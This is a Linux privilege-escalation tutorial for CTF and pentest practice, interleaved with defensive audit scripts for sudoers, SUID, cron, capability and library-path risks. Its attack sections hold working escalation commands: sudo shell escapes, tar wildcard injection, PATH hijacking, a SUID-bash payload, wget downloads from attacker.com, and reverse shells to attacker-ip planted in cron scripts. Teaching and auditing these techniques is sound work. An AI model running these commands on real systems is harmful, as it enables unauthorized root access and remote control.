Introduction to Linux Privilege Escalation
Privilege escalation is the process of increasing access levels from a limited user account to root or another privileged user. After initial compromise, attackers seek to escalate privileges to access sensitive data, modify system configurations, and maintain persistent access. Understanding privilege escalation techniques is fundamental to both offensive and defensive security.
In CTF competitions and authorized penetration testing, privilege escalation demonstrates complete system compromise. This tutorial covers the most common Linux privilege escalation vectors, exploitation techniques, and defensive measures.
Enumerating the System
Before attempting escalation, gather system information to identify potential vulnerabilities.
Basic Enumeration Commands
# Current user and groups
id
whoami
groups
# System information
uname -a
cat /etc/os-release
lsb_release -a
# Kernel version
uname -r
# Installed packages
dpkg -l # Debian/Ubuntu
rpm -qa # RedHat/CentOS
Identify Sudoers and Permissions
# Check sudoers configuration
sudo -l
# If you have a password, attempt to run commands as other users
sudo -u username whoami
# Find files owned by root with SUID bit
find / -perm -4000 -type f 2>/dev/null
# Find world-writable directories
find / -perm -002 -type d 2>/dev/null
# Find files with the SGID bit set
find / -perm -2000 -type f 2>/dev/null
Check Running Processes
# View all processes with user context
ps aux
# Look for processes running as root
ps aux | grep root
# Monitor process creation
watch -n 0.1 'ps aux | head -20'
Sudo Misconfiguration Exploitation
Sudo Without Password
If sudoers allows command execution without a password, direct escalation is possible:
# Check sudoers permissions
sudo -l
# Example output:
# User may run the following commands:
# (root) NOPASSWD: /usr/bin/wget
If /usr/bin/wget can run as root without a password:
# Create malicious script
sudo wget http://attacker.com/malicious.sh -O /tmp/script.sh
sudo bash /tmp/script.sh
Sudo with Command Restrictions
Restricted sudo commands may have bypasses. Common vulnerable commands:
Wget exploitation:
sudo wget http://attacker.com/shell.sh -O /dev/shm/shell.sh
bash /dev/shm/shell.sh
Vim exploitation:
sudo vim
# Inside vim:
:set shell=/bin/bash
:shell
# Now you have a shell as root
Git exploitation:
sudo git config --global core.editor '/bin/bash'
sudo git -c core.editor='/bin/bash' commit --allow-empty --no-verify
Less/More exploitation:
sudo less /etc/passwd
# Inside less, type:
# !bash (executes shell command)
Wildcard Injection
Commands using wildcards in cron jobs may be exploitable:
# Vulnerable cron entry:
# * * * * * tar -czf /backup/backup.tar.gz /home/user/*
# Create malicious file
touch /home/user/'--checkpoint=1'
touch /home/user/'--checkpoint-action=exec=bash shell.sh'
# When cron executes, tar interprets these as arguments
# causing arbitrary command execution
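A defender's counterpart to the cron entry above, added here as an example and not part of the original tutorial: a check that lists option-looking filenames in a directory a cron job globs, and a replacement tar invocation that no filename can steer. The directory and files used in the demo are constructed for this example.

```bash
#!/usr/bin/env bash
# Added example, not from the original tutorial. Two defensive pieces for the
# "tar -czf backup.tar.gz /home/user/*" pattern shown above:
#   find_option_like_names DIR   lists direct children of DIR whose names start
#                                with "-", i.e. exactly the names a DIR/* glob
#                                would hand to tar as options
#   safe_backup DIR ARCHIVE      archives DIR without a glob, so no filename
#                                can ever be parsed as an option
# The directory and files built in demo() are constructed for this example.
set -u

find_option_like_names() {
    local dir=$1
    # -mindepth 1 -maxdepth 1: only the entries that DIR/* would expand to
    find "$dir" -mindepth 1 -maxdepth 1 -name '-*' | sed 's#.*/##' | LC_ALL=C sort
}

# Hardened replacement for "tar -czf ARCHIVE DIR/*": change into DIR and archive
# "." instead of expanding a glob, and end option parsing with "--" so that a
# dash-prefixed operand can never be read as an option.
safe_backup() {
    local dir=$1 archive=$2
    tar -czf "$archive" -C "$dir" -- .
}

# Number of entries stored in ARCHIVE (the "./" directory entry counts as one).
archive_entry_count() {
    tar -tzf "$1" | wc -l | tr -d ' '
}

demo() {
    local dir archive
    dir=$(mktemp -d)
    archive=$(mktemp)
    # constructed contents: two legitimate files and two option-looking names
    touch "$dir/notes.txt" "$dir/report.pdf" \
          "$dir/--checkpoint=1" "$dir/--checkpoint-action=exec=true"
    echo "option-looking names in $dir:"
    find_option_like_names "$dir"
    safe_backup "$dir" "$archive"
    echo "entries archived with the hardened command: $(archive_entry_count "$archive")"
    rm -rf "$dir" "$archive"
}

demo
```

Any name reported by find_option_like_names in a directory that a root cron job expands with `*` is worth an investigation on its own; the lasting fix is the glob-free tar line, which archives the option-looking files as ordinary members instead of obeying them.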
SUID Bit Exploitation
Files with the SUID bit set run with the privileges of the file's owner (root, for the binaries below) rather than those of the user who launched them.
Finding SUID Programs
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Output might include:
# /usr/bin/passwd
# /usr/bin/sudo
# /usr/bin/chsh
# /usr/local/bin/custom-admin (potentially vulnerable)
SUID Binary PATH Hijacking
If a SUID binary calls system() or a PATH-searching exec function with a bare command name instead of an absolute path, the caller's PATH decides which program actually runs:
# Vulnerable binary source code (suid.c):
#include <stdlib.h>
int main(void) {
    /* "cat" is a bare name: /bin/sh resolves it through the caller's PATH */
    system("cat /root/flag.txt");
    return 0;
}
# Compiled as SUID:
gcc -o suid suid.c
sudo chown root suid && sudo chmod 4755 suid
# Create malicious 'cat' in attacker's PATH
echo -e '#!/bin/bash\n/bin/bash' > ~/cat
chmod +x ~/cat
export PATH=~:$PATH
./suid # Now executes our cat, spawning a root shell
Library Injection
Programs that load shared libraries by search path rather than by absolute path may be exploitable. Two caveats a defender should know: the dynamic loader ignores LD_LIBRARY_PATH and LD_PRELOAD when it starts a setuid or setgid binary, so this technique targets privileged contexts that inherit an environment (a root cron job or service) rather than SUID bits directly; and ldd may execute the binary it inspects, so run it only on programs you trust:
# Check library dependencies
ldd /usr/local/bin/vulnerable-program
# Example vulnerable output:
# libutils.so => not found
# Create malicious library
gcc -shared -fPIC -o libutils.so evil.c
export LD_LIBRARY_PATH=.:$LD_LIBRARY_PATH
/usr/local/bin/vulnerable-program # Loads our malicious library
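The defensive check that follows from the library hijack above, added as an example and not part of the original tutorial: audit every directory the loader may search for libraries, whether configured under an ld.so.conf.d-style directory or inherited through an LD_LIBRARY_PATH value, and report entries that are relative, missing, or world-writable. The config directory and paths in the demo are constructed stand-ins.

```bash
#!/usr/bin/env bash
# Added example, not from the original tutorial. Audits library search
# directories for the hijack described above. The dynamic loader ignores
# LD_LIBRARY_PATH for setuid/setgid programs, so the realistic risk is a
# configured or inherited library directory that a non-root user can write to.
#   dirs_from_ldconf CONF_DIR   prints the directories listed in CONF_DIR/*.conf
#                               (CONF_DIR stands in for /etc/ld.so.conf.d)
#   split_colon_list VALUE      one entry per line from an LD_LIBRARY_PATH value
#   audit_lib_dirs              reads one directory per line on stdin and reports
#                               RELATIVE, MISSING or WRITABLE (world-writable)
# Everything built in demo() is constructed for this example.
set -u

dirs_from_ldconf() {
    local conf_dir=$1
    # drop comments, blank lines and "include" directives; trim whitespace
    cat "$conf_dir"/*.conf 2>/dev/null \
        | sed -e 's/#.*//' -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//' -e '/^$/d' \
        | grep -v '^include'
}

split_colon_list() {
    printf '%s\n' "$1" | tr ':' '\n'
}

audit_lib_dirs() {
    local dir
    while IFS= read -r dir; do
        if [ -z "$dir" ] || [ "${dir#/}" = "$dir" ]; then
            # empty or relative entries mean "the current directory", wherever that is
            printf 'RELATIVE %s\n' "${dir:-.}"
        elif [ ! -d "$dir" ]; then
            printf 'MISSING %s\n' "$dir"
        elif [ -n "$(find "$dir" -maxdepth 0 -perm -002)" ]; then
            printf 'WRITABLE %s\n' "$dir"
        fi
    done
}

demo() {
    local conf writable
    conf=$(mktemp -d)
    writable=$(mktemp -d); chmod 0777 "$writable"
    printf 'include /etc/ld.so.conf.d/*.conf\n' > "$conf/main.conf"
    printf '# constructed local config\n%s\n/opt/constructed-missing/lib\n' \
        "$writable" > "$conf/local.conf"
    echo "ld.so.conf.d findings:"
    dirs_from_ldconf "$conf" | audit_lib_dirs
    echo "LD_LIBRARY_PATH findings:"
    split_colon_list ".:$writable" | audit_lib_dirs
    rm -rf "$conf" "$writable"
}

demo
```

A MISSING directory is worth reporting too: if its parent is writable, a user can create it and the loader will start searching it on the next run.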
Kernel Exploit Vulnerabilities
Outdated kernels contain exploitable vulnerabilities. Identify and exploit them:
# Check kernel version
uname -r
# Example: 4.4.0-59-generic
# Search for known exploits
searchsploit linux kernel 4.4.0
# Or use kernel exploit checker
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
bash linux-exploit-suggester.sh
CVE-2016-5195 (Dirty COW)
An example of a critical kernel vulnerability:
# Compile and execute exploit
gcc -pthread dirty_cow.c -o dirty_cow -lutil
./dirty_cow /etc/passwd
# Or download pre-compiled exploit
wget https://github.com/dirtycow/dirtycow.github.io/blob/master/run.sh
bash run.sh
Cron Job Exploitation
Misconfigured cron jobs often provide escalation opportunities:
World-Writable Cron Scripts
# Find cron jobs
cat /etc/crontab
ls /etc/cron.d/
ls /etc/cron.daily/
# Check for world-writable scripts
ls -la /etc/cron.daily/backup.sh
# If writable, modify it
echo 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1' >> /etc/cron.daily/backup.sh
# Wait for cron to execute as root
Path Hijacking in Cron
# Vulnerable cron job:
# * * * * * /usr/bin/backup.sh
# Script content:
# #!/bin/bash
# tar -czf backup.tar.gz /home/user/files
# Exploit: Create malicious 'tar' in /tmp
echo '#!/bin/bash' > /tmp/tar
echo 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1' >> /tmp/tar
chmod +x /tmp/tar
# Modify PATH if possible
export PATH=/tmp:$PATH
Capability Exploitation
Linux capabilities split root's privileges into fine-grained units, but a binary granted a powerful one (such as cap_setuid on an interpreter) is as dangerous as a SUID root binary:
# Find binaries with capabilities
getcap -r / 2>/dev/null
# Example vulnerable output:
# /usr/bin/python3 = cap_setuid+ep
# Exploit:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
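The matching audit for the capability finding above, added as an example and not part of the original tutorial: feed `getcap -r /` output to a filter that reports only the capabilities that are root-equivalent on their own. Both getcap output formats are handled; the sample lines in the demo are constructed.

```bash
#!/usr/bin/env bash
# Added example, not from the original tutorial. Reads "getcap -r /" output on
# stdin and reports capabilities that are root-equivalent when granted to an
# interpreter or general-purpose tool. Both output formats are accepted:
#   /usr/bin/python3 = cap_setuid+ep      (older libcap)
#   /usr/bin/python3 cap_setuid=ep        (newer libcap)
# The sample lines in demo() are constructed.
set -u

# Capabilities that hand over root-equivalent power on their own.
is_root_equivalent_cap() {
    case $1 in
        cap_setuid|cap_setgid|cap_sys_admin|cap_sys_module|cap_sys_ptrace|\
        cap_dac_override|cap_dac_read_search|cap_chown|cap_fowner|cap_sys_rawio)
            return 0 ;;
        *)  return 1 ;;
    esac
}

# Prints "path capability" for every root-equivalent capability found.
flag_dangerous_caps() {
    local line path rest cap
    while IFS= read -r line; do
        [ -z "$line" ] && continue
        path=${line%%[[:space:]]*}       # first token is always the file path
        rest=${line#*[[:space:]]}        # the capability list, whatever its format
        for cap in $(printf '%s' "$rest" | grep -o 'cap_[a-z_]*' || true); do
            if is_root_equivalent_cap "$cap"; then
                printf '%s %s\n' "$path" "$cap"
            fi
        done
    done
}

demo() {
    # constructed getcap output: ping is normal, the other three are not
    printf '%s\n' \
        '/usr/bin/ping cap_net_raw=ep' \
        '/usr/bin/python3 = cap_setuid+ep' \
        '/usr/local/bin/netmon cap_net_admin,cap_net_raw,cap_sys_ptrace=eip' \
        '/opt/agent/bin/agent cap_dac_override+ep' | flag_dangerous_caps
}

demo
```

Run it as `getcap -r / 2>/dev/null | flag_dangerous_caps` on a real host; cap_net_raw on ping is expected, whereas any of the listed capabilities on an interpreter, shell, or editor should be removed with `setcap -r` unless a documented need exists.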
Practical Privilege Escalation Scenario
Simulate a complete CTF-style escalation:
Step 1: Enumerate system
id
sudo -l
cat /etc/crontab
find / -perm -4000 -type f 2>/dev/null
Step 2: Identify vector
# Found vulnerable service running as root
ps aux | grep root
# /usr/local/bin/vulnerable-service
# Check for exploitable code path
strings /usr/local/bin/vulnerable-service | grep system
Step 3: Develop exploit
# Service uses system() with injectable parameter
# Create payload
echo -e '#!/bin/bash\nchmod 4755 /bin/bash' > /tmp/privesc.sh
chmod +x /tmp/privesc.sh
Step 4: Execute escalation
# Trigger vulnerability with our payload
/usr/local/bin/vulnerable-service "../privesc.sh"
# Verify root access
/bin/bash -p
id # Should show uid=0(root)
Defensive Measures
System Hardening
Minimize SUID binaries:
# Review SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Remove unnecessary SUID bits
chmod u-s /usr/bin/custom-admin
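Both the SUID discovery step earlier and the "Minimize SUID binaries" step here boil down to the same review, so the following example, added here and not part of the original tutorial, turns it into a repeatable drift check against an approved baseline. The directory tree and baseline file in the demo are constructed; in production the root is / and the baseline is the list approved after the first review.

```bash
#!/usr/bin/env bash
# Added example, not from the original tutorial. Turns the one-off
# "find / -perm -4000" review into a repeatable check against an approved list:
#   suid_inventory ROOT        sorted SUID/SGID regular files under ROOT
#   suid_drift BASELINE ROOT   prints "+path" for binaries missing from BASELINE
#                              and "-path" for BASELINE entries that are gone;
#                              returns 1 when anything drifted
# In production ROOT is / and BASELINE is the list approved after the initial
# review; the tree and baseline built in demo() are constructed.
set -u

suid_inventory() {
    local root=$1
    # -xdev: do not descend into other mounted filesystems such as /proc
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | LC_ALL=C sort
}

suid_drift() {
    local baseline=$1 root=$2 current added removed
    current=$(mktemp)
    suid_inventory "$root" > "$current"
    # comm needs both inputs sorted under the same collation
    added=$(LC_ALL=C sort "$baseline" | LC_ALL=C comm -13 - "$current")
    removed=$(LC_ALL=C sort "$baseline" | LC_ALL=C comm -23 - "$current")
    rm -f "$current"
    [ -n "$added" ] && printf '%s\n' "$added" | sed 's/^/+/'
    [ -n "$removed" ] && printf '%s\n' "$removed" | sed 's/^/-/'
    [ -z "$added$removed" ]
}

demo() {
    local root baseline
    root=$(mktemp -d)
    mkdir -p "$root/usr/bin" "$root/usr/local/bin"
    # constructed tree: two expected SUID/SGID binaries and one unexpected one
    : > "$root/usr/bin/passwd";             chmod 4755 "$root/usr/bin/passwd"
    : > "$root/usr/bin/wall";               chmod 2755 "$root/usr/bin/wall"
    : > "$root/usr/local/bin/custom-admin"; chmod 4755 "$root/usr/local/bin/custom-admin"
    baseline=$(mktemp)
    printf '%s\n' "$root/usr/bin/passwd" "$root/usr/bin/wall" > "$baseline"
    echo "drift against baseline:"
    suid_drift "$baseline" "$root" || echo "(drift detected, exit status $?)"
    rm -rf "$root" "$baseline"
}

demo
```

A "+" line is either a package update that legitimately added a SUID helper or the kind of custom-admin binary the tutorial warns about; either way it needs a decision before it is added to the baseline. A "-" line after a hardening pass is the expected confirmation that `chmod u-s` took effect.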
Restrict sudo:
# Limit sudo commands in /etc/sudoers
username ALL=(root) NOPASSWD: /usr/bin/specific-command
# Never allow:
# username ALL=(ALL) NOPASSWD: ALL
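The sudo findings from the exploitation section (NOPASSWD on wget, vim, git, less, and the like) and the "Restrict sudo" rule here can be checked mechanically. The script below is an added example, not part of the original tutorial: it reads a sudoers-format file and reports NOPASSWD rules that grant ALL as CRITICAL and any rule whose command is a shell-capable editor, pager, interpreter, or downloader as WARN. The sudoers rules in the demo are constructed.

```bash
#!/usr/bin/env bash
# Added example, not from the original tutorial. Audits sudoers rules for the
# two problems discussed above: NOPASSWD rules that grant ALL, and rules (with
# or without a password) whose commands are editors, pagers, interpreters or
# downloaders that can spawn a shell or write files as root.
#   audit_sudoers FILE   prints "CRITICAL user NOPASSWD ALL" or
#                        "WARN user /path/to/command" per finding
# Reads a plain sudoers-format file (Defaults, alias and include lines are
# skipped); the rules in demo() are constructed.
set -u

# Binaries from the section above plus a few that are equally shell-capable.
is_shell_escape() {
    case $1 in
        vi|vim|nvim|nano|less|more|man|wget|curl|git|find|awk|gawk|\
        python|python2|python3|perl|bash|sh|dash|zsh|env)
            return 0 ;;
        *)  return 1 ;;
    esac
}

audit_sudoers() {
    local file=$1 line user rest nopasswd spec cmd
    while IFS= read -r line || [ -n "$line" ]; do
        case $line in ''|'#'*|@*|Defaults*|*_Alias*) continue ;; esac
        user=${line%%[[:space:]]*}
        rest=${line#*=}                       # text after "HOST="
        nopasswd=0
        case $rest in *NOPASSWD:*) nopasswd=1 ;; esac
        # drop the "(runas)" part and tags such as NOPASSWD: or SETENV:
        spec=$(printf '%s' "$rest" | sed -E 's/\([^)]*\)//; s/[A-Z]+://g')
        # one command per line; the first word is the program, the rest its args
        printf '%s\n' "$spec" | tr ',' '\n' | while read -r cmd _; do
            [ -z "$cmd" ] && continue
            if [ "$cmd" = ALL ]; then
                [ "$nopasswd" -eq 1 ] && printf 'CRITICAL %s NOPASSWD ALL\n' "$user"
            elif is_shell_escape "${cmd##*/}"; then
                printf 'WARN %s %s\n' "$user" "$cmd"
            fi
        done
    done < "$file"
    return 0
}

demo() {
    local f
    f=$(mktemp)
    # constructed sudoers: one sane admin rule, three of the patterns above
    cat > "$f" <<'EOF'
Defaults env_reset
alice ALL=(ALL:ALL) ALL
bob   ALL=(root) NOPASSWD: /usr/bin/vim, /usr/bin/less /var/log/syslog
carol ALL=(ALL) NOPASSWD: ALL
dave  ALL=(root) NOPASSWD: /usr/local/bin/specific-command
EOF
    audit_sudoers "$f"
    rm -f "$f"
}

demo
```

Point it at `/etc/sudoers` and each file in `/etc/sudoers.d/` (the script does not follow include lines itself). A WARN on a command that really must be delegated is the cue to replace it with a purpose-built wrapper script, as the "specific-command" rule above does, rather than granting the general-purpose tool.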
Secure file permissions:
# Ensure important files aren't world-writable
chmod 755 /etc/cron.d/
chmod 755 /etc/cron.daily/
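The cron exploitation section (world-writable scripts, PATH hijacking) and the "Secure file permissions" step here call for the same audit, so one added example covers both; it is not part of the original tutorial. It reports group- or world-writable files and non-root ownership under cron directories, checks every PATH= line in a crontab for relative, missing, or writable entries, and flags crontab commands given by bare name instead of absolute path. The crontab and directories in the demo are constructed.

```bash
#!/usr/bin/env bash
# Added example, not from the original tutorial. Audits the cron attack surface
# covered above: writable cron scripts, non-root ownership, crontab PATH= values
# with writable or relative directories, and commands given by bare name.
#   audit_cron_files DIR...    WRITABLE / NOTROOT findings for files under DIR...
#   audit_path_value VALUE     RELATIVE / MISSING / WRITABLE findings for a PATH value
#   audit_crontab FILE         runs audit_path_value on PATH= lines and reports
#                              RELATIVE commands in system-crontab-format lines
# The crontab and directories built in demo() are constructed.
set -u
set -f   # no pathname expansion, so "* * * * *" fields stay literal when split

audit_cron_files() {
    # group- or world-writable scripts let a non-root user edit what root runs
    find "$@" -type f \( -perm -002 -o -perm -020 \) 2>/dev/null | sed 's/^/WRITABLE /'
    find "$@" -type f ! -user root 2>/dev/null | sed 's/^/NOTROOT /'
}

audit_path_value() {
    local IFS=: entry
    for entry in $1; do
        if [ -z "$entry" ] || [ "${entry#/}" = "$entry" ]; then
            printf 'RELATIVE %s\n' "${entry:-.}"
        elif [ ! -d "$entry" ]; then
            printf 'MISSING %s\n' "$entry"
        elif [ -n "$(find "$entry" -maxdepth 0 -perm -002)" ]; then
            printf 'WRITABLE %s\n' "$entry"
        fi
    done
}

audit_crontab() {
    local file=$1 line cmd value
    while IFS= read -r line || [ -n "$line" ]; do
        case $line in
            ''|'#'*) continue ;;
            PATH=*)
                value=${line#PATH=}; value=${value#\"}; value=${value%\"}
                audit_path_value "$value" | sed 's/^/PATH /'
                continue ;;
            @*) set -- $line; cmd=${3:-} ;;   # "@reboot user command ..."
            *)  set -- $line; cmd=${7:-} ;;   # "m h dom mon dow user command ..."
        esac
        # a bare command name is resolved through cron's PATH, which is the hijack
        if [ -n "$cmd" ] && [ "${cmd#/}" = "$cmd" ]; then
            printf 'RELATIVE %s\n' "$cmd"
        fi
    done < "$file"
    return 0
}

demo() {
    local cron_d writable crontab
    cron_d=$(mktemp -d)
    writable=$(mktemp -d); chmod 0777 "$writable"
    printf '#!/bin/sh\necho backup\n' > "$cron_d/backup.sh"; chmod 0777 "$cron_d/backup.sh"
    printf '#!/bin/sh\necho rotate\n' > "$cron_d/rotate.sh"; chmod 0755 "$cron_d/rotate.sh"
    crontab=$(mktemp)
    cat > "$crontab" <<EOF
# constructed system crontab
SHELL=/bin/sh
PATH=$writable:/usr/bin:/bin
* * * * * root /usr/local/bin/backup.sh
0 3 * * * root tar -czf /backup/home.tgz -C /home .
@reboot   root /usr/local/bin/start-agent
EOF
    echo "cron directory findings:";  audit_cron_files "$cron_d"
    echo "crontab findings:";         audit_crontab "$crontab"
    rm -rf "$cron_d" "$writable" "$crontab"
}

demo
```

The fix for every finding is the same shape: scripts under `/etc/cron.*` owned by root and mode 0755 or stricter, a crontab PATH limited to root-owned system directories, and absolute paths both in crontab lines and inside the scripts they run (a `PATH=/usr/sbin:/usr/bin:/sbin:/bin` line at the top of each script removes the dependency on the inherited environment).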
Keep systems updated:
# Regular patching prevents kernel exploits
apt update && apt upgrade
Useful Tools
- linpeas.sh: Comprehensive automated enumeration
- linux-exploit-suggester: Identifies kernel exploits
- GTFOBins: Database of Unix binaries for exploitation
- pspy: Monitor running processes in real-time
Conclusion
Linux privilege escalation requires methodical enumeration, understanding of system configuration, and knowledge of common vulnerability patterns. Sudo misconfigurations, SUID exploitation, and kernel vulnerabilities consistently provide escalation paths in real systems.
Practice privilege escalation on CTF platforms like HackTheBox and TryHackMe. In authorized penetration tests, focus on the most impactful escalation vectors first—sudo exploits often require less effort than kernel compilation. Always maintain detailed documentation of your escalation techniques for your assessment report.